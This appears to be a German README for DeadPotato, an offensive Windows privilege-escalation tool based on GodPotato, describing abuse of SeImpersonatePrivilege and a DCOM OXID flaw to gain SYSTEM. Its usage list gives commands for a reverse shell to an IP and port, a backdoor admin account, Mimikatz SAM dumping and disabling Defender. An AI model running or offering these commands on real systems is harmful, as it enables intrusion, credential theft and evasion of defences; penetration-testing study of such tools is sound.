DeadPotato

Hashdump- und SharpHound-Module jetzt verfügbar!

❗ Die Nutzung dieses Programms in einem nicht autorisierten Kontext ist strengstens untersagt. Die Autoren von DeadPotato übernehmen keine Verantwortung für Schäden, die den Systemen entstehen. Mit Vorsicht verwenden. ❗

C:Userslypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   |  _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITYSYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

Schnellstart – Verwendung

Das SeImpersonatePrivilege -Recht ist in Ihrem Kontext aktiviert? Mit DeadPotato ist es möglich, maximale Privilegien auf dem lokalen System zu erreichen.

Das Tool versucht, einen erhöhten Prozess zu starten, der im Kontext des NT AUTHORITYSYSTEM Benutzers ausgeführt wird, indem es den RPCSS-Fehler des DCOM bei der Verarbeitung von OXIDs missbraucht und so den uneingeschränkten Zugriff auf die Maschine ermöglicht, damit kritische Vorgänge frei ausgeführt werden können.

️ Im folgenden Fall wird das Modul -cmd verwendet. Viele Module stehen zur Verwendung zur Verfügung, beispielsweise -rev IP:PORT zum Erstellen einer erhöhten Reverse-Shell, -newadmin usr:pass zum Erstellen eines neuen lokalen Administratorbenutzers für Persistenz oder -mimi sam zum Dumpen von SAM-Hashes.

Überprüfen Sie die SeImpersonatePrivilege-Rechte

Um DeadPotato verwenden zu können, muss das SeImpersonatePrivilege-Recht im aktuellen Kontext aktiviert sein. Um dies zu überprüfen, kann der Befehl whoami /priv ausgeführt werden. Wenn diese Berechtigung deaktiviert ist, ist eine Ausnutzung im aktuellen Kontext nicht möglich.

C:Userslypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

Erhalten einer erhöhten Reverse-Shell

Credits

Dieses Projekt „DeadPotato“ ist ein Tool, das auf dem Quellcode des Meisterwerks „GodPotato“ von BeichenDream basiert. Wenn Ihnen dieses Projekt gefällt, stellen Sie sicher, dass Sie auch das Originalprojekt unterstützen

BeichenDream, Benjamin DELPY gentilkiwi , BloodHound-Entwickler.

Lizenz

Dieses Projekt ist unter der Apache 2.0-Lizenz lizenziert. Weitere Informationen finden Sie in der LIZENZ-Datei.